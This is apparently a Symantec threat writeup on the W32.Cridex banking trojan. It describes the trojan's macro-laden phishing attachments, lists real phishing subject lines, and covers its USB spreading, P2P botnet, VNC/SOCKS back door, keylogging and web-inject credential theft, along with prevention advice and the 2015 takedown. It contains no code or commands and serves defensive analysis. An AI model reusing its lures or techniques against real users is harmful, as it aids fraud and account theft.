1. /
  2. Security Response/
  3. W32.Cridex


Risk Level 1: Very Low

January 20, 2012
November 12, 2015 1:57:18 PM
Infection Length:
Systems Affected:
Windows 2000, Windows 7, Windows 95, Windows 98, Windows Me, Windows NT, Windows Server 2003, Windows Server 2008, Windows Vista, Windows XP
1. Prevention and avoidance
1.1 User behavior and precautions
1.2 Ensure security software is up-to-date and active
1.3 Use email filtering
2. Infection methods
2.1 Email attachments
2.1.1 Malicious Microsoft Office macros
2.2 Self-replication
3. Functionality
3.1 Installation
3.2 Botnet addition
3.3 Back door
3.4 Information theft
3.5 Download components
4. Additional information
4.1 FBI takedown
4.2 Resources

The following actions can be taken to avoid or minimize the risk from this threat.

1.1 User behavior and precautions
Be aware of attackers’ social-engineering techniques and avoid opening attachments or links in emails that are sent by unknown recipients. Attackers attempt to entice users into opening attachments or links in their messages in many different ways, such as claiming that the attachment is a bill, a fax notification, a special offer, or a delivery notice.

Do not enable Microsoft Office macros. Attackers often implement macros with malicious code into their documents. They then attach these malicious files to spam or spear-phishing emails, and try to trick users into opening them and enabling the macros. If the user agrees to activate macros, then the malicious code downloads additional threats from a remote location onto the computer. Microsoft disables macros by default because of this security risk. The company gives users the option to enable them, though this would not be recommended.

Cridex is capable of spreading through removable drives. Based on this, users are advised to take caution when connecting such a device to their computer. It’s a good security practice to disable the AutoRun feature so that removable devices do not execute when they are inserted into a computer. It should be noted that the AutoRun feature is disabled by default for non-optical removable drives in recent versions of Windows and on computers with certain updates applied. Removable drives should be disconnected when not required. If write access is not required, users should enable read-only mode if the option is available on the drive.

1.2 Ensure security software is up-to-date and active

Symantec and Norton products detect W32.Cridex and its variants. Symantec reputation-based detection technologies are also able to proactively protect against many of the files used in these attacks. Keep your security software up to date to protect yourself from the latest variants of this threat.

1.3 Use email filtering
Email-filtering services such as Symantec Messaging Gateway and Symantec Email Security.cloud can help to filter out potential targeted attack emails before they reach the intended users.


The threat may use the following infection methods to compromise the affected computer.

2.1 Email attachments
W32.Cridex is typically spread through spam or phishing emails with malicious attachments. The emails use social-engineering techniques to convince the user to open the attachment. For example, some Cridex emails claim that the attachment is an invoice for water services or web hosting, which requires the user’s attention. Others claim that the user has received a fax containing a hotel itinerary.

The following subjects were observed in Cridex emails that were delivered to English and French speakers in October and November 2015:
  • Comptabilité de PACAR : facture n° AAAAAAAA du 26/10
  • Your Norwich Camping Order has shipped!
  • Facture
  • devis nettoyage
  • Scan Data from FX-D6DBE1
  • Your MF Communications bill for
  • Please prepare below requirements for your Pouch
  • Votre FACTURE
  • Facture / actual Rennes
  • [Scan] 2015-10-14 5:29:54 p.m.
  • "Invoice-302673.doc"
  • Insurance
  • Water Services Invoice
  • Your latest DHL invoice
  • Copy of Invoice(s)
  • order-so00653333-1.doc

The most recent Cridex email attachments are Word and Excel documents with malicious macros installed. These macros are used to drop the payload onto the affected computer.

2.1.1 Malicious Microsoft Office macros
A macro is made up of a series of commands and instructions grouped in a single function, letting the user perform an action much faster than if it was manually conducted. Microsoft created macros for its Office software suite to allow users to automate frequently used tasks. They are written in a programming language called Visual Basic for Applications (VBA).

While macros were designed for legitimate purposes, attackers have created some that can perform malicious actions. The attackers embed the macros in Microsoft Office documents and spread them in spam or targeted emails.

Microsoft is aware of this issue and has since disabled macros from loading in Office documents by default. In their attempts to circumvent this protection, attackers use social-engineering techniques to convince users to enable macros to run.

For Cridex campaigns, the attackers code the malicious macros to drop the malware onto computers. If the user chooses to enable macros, then the threat is installed.

Symantec detects the Word documents containing the malicious macros seen in Cridex campaigns as W97M.Downloader.

2.2 Self-replication
Cridex is capable of spreading onto removable devices connected to the computer. It propagates by copying itself to mapped network drives and attached local storage such as USB keys. If an infected device is plugged into another computer and is set to execute once this occurs, then the malware will install itself on this computer.

Once the threat has compromised the computer, it may perform the following actions.

3.1 Installation
When Cridex is executed, it creates a loader module on the computer. The loader reads its configuration details to allow it to find out the remote location of the threat’s worker module, which contains all of Cridex’s main functionality.

3.2 Botnet addition
The attackers use multiple, segregated peer-to-peer (P2P) botnets for Cridex’s infrastructure. By using P2P botnets, the attackers don’t need to route their commands through a centralized location. The P2P nature of the botnets means that commands are propagated through multiple connections, making the infrastructure resilient to takedowns. The fact that the attackers use more than one botnet makes the threat even more difficult to tackle.

Once the worker module is downloaded and installed, the loader adds the compromised computer to one of Cridex’s botnets. The loader then retrieves a list of other bots, commands, and updated modules. The Cridex malware has been observed using HTTPS on unconventional ports to connect to other bots.

A Cridex botnet includes C&C servers which are either compromised third-party computers or are owned by the attackers. The network also contains compromised computers; some are classed as “super peers” and others act as “peers.” The super peers receive the most up-to-date commands and configuration details from the attacker, and spread them to the normal peers.

Once executed, the worker module takes charge of performing the malware’s main commands. It connects with other peers and servers through HTTPS or raw TCP. The data that the module sends and receives is encrypted and compressed, making the traffic harder to detect.

3.3 Back door
Cridex opens a back door on compromised computers to give the attackers remote access to the entire computer. It does this by setting up a Virtual Network Computing (VNC) server, mini web server, or a Socket Secure (SOCKS) server.

The threat has been observed connecting to domain names generated with an algorithm and predetermined IP addresses. When the attackers have this back door access, they can monitor network traffic. They can also upload, download, and execute files.

3.4 Information theft
Cridex includes several information-stealing features, letting the attackers obtain a huge amount of the victim’s sensitive information and take over their online accounts. The threat can capture screenshots and log keystrokes. It also injects itself into web browsers to display its own content, and gather saved passwords, cookies, or data entered into forms.

The malware waits until the user visits online banking sites that are listed in its configuration file. Once this happens, the malware injects its own web content into the website’s HTML code in order to mimic the appearance of the site’s login and transaction pages.

If the user inputs their details into these fraudulent web pages, then their data is saved into a file and is sent to the attacker’s remote location. This gives the attackers the means to access the victim’s bank account. They could directly steal the victim’s money or sell this data to other cybercriminals.

3.5 Download components

Cridex is capable of downloading additional modules to update its functionality or C&C infrastructure.

The following details activities surrounding Cridex, along with resources to learn more about hte threat.

4.1 Law enforcement takedown
On October 13, 2015, international law enforcement agencies announced that they sinkholed thousands of Cridex-compromised computers, releasing them from the botnet that they were on. The sinkholing operation involved the entities redirecting the bots’ traffic away from Cridex C&C servers to benign substitute servers. The police also arrested one man in connection with the malware’s activities.

While the crackdown had an impact on Cridex’s infrastructure, it hasn’t entirely ended the threat’s campaigns. Symantec has observed a continuation of W32.Cridex activity following the takedown.

Symantec has seen and blocked multiple email-based malware runs numbering in the tens of thousands just days after the takedown. The emails used in these attacks are being blocked by our email protection technologies in Symantec Email Security.cloud and Symantec Messaging Gateway.

We also observed Cridex infections occurring after the October 13 takedown announcement. Cridex infections increased between October 12 and October 15, before dropping again. Then from October 20, infections shot up and continued at these heights up to the end of the month. The following chart shows Cridex infection activity before and after the takedown.

While law enforcement crackdowns against malware infrastructure can play a significant role in disrupting cybercriminals’ activities, users should not assume that the threat is gone after these actions.

4.2 Resources
For more information relating to this threat family, please see the following resources:



Symantec Security Response encourages all users and administrators to adhere to the following basic security "best practices":

  • Use a firewall to block all incoming connections from the Internet to services that should not be publicly available. By default, you should deny all incoming connections and only allow services you explicitly want to offer to the outside world.
  • Enforce a password policy. Complex passwords make it difficult to crack password files on compromised computers. This helps to prevent or limit damage when a computer is compromised.
  • Ensure that programs and users of the computer use the lowest level of privileges necessary to complete a task. When prompted for a root or UAC password, ensure that the program asking for administration-level access is a legitimate application.
  • Disable AutoPlay to prevent the automatic launching of executable files on network and removable drives, and disconnect the drives when not required. If write access is not required, enable read-only mode if the option is available.
  • Turn off file sharing if not needed. If file sharing is required, use ACLs and password protection to limit access. Disable anonymous access to shared folders. Grant access only to user accounts with strong passwords to folders that must be shared.
  • Turn off and remove unnecessary services. By default, many operating systems install auxiliary services that are not critical. These services are avenues of attack. If they are removed, threats have less avenues of attack.
  • If a threat exploits one or more network services, disable, or block access to, those services until a patch is applied.
  • Always keep your patch levels up-to-date, especially on computers that host public services and are accessible through the firewall, such as HTTP, FTP, mail, and DNS services.
  • Configure your email server to block or remove email that contains file attachments that are commonly used to spread threats, such as .vbs, .bat, .exe, .pif and .scr files.
  • Isolate compromised computers quickly to prevent threats from spreading further. Perform a forensic analysis and restore the computers using trusted media.
  • Train employees not to open attachments unless they are expecting them. Also, do not execute software that is downloaded from the Internet unless it has been scanned for viruses. Simply visiting a compromised Web site can cause infection if certain browser vulnerabilities are not patched.
  • If Bluetooth is not required for mobile devices, it should be turned off. If you require its use, ensure that the device's visibility is set to "Hidden" so that it cannot be scanned by other Bluetooth devices. If device pairing must be used, ensure that all devices are set to "Unauthorized", requiring authorization for each connection request. Do not accept applications that are unsigned or sent from unknown sources.
  • For further information on the terms used in this document, please refer to the Security Response glossary.
Writeup By: Laura O'Brien
Summary| Technical Details| Removal

Search Threats

Search by name
Example: W32.Beagle.AG@mm
STAR Antimalware Protection Technologies
Internet Security Threat Report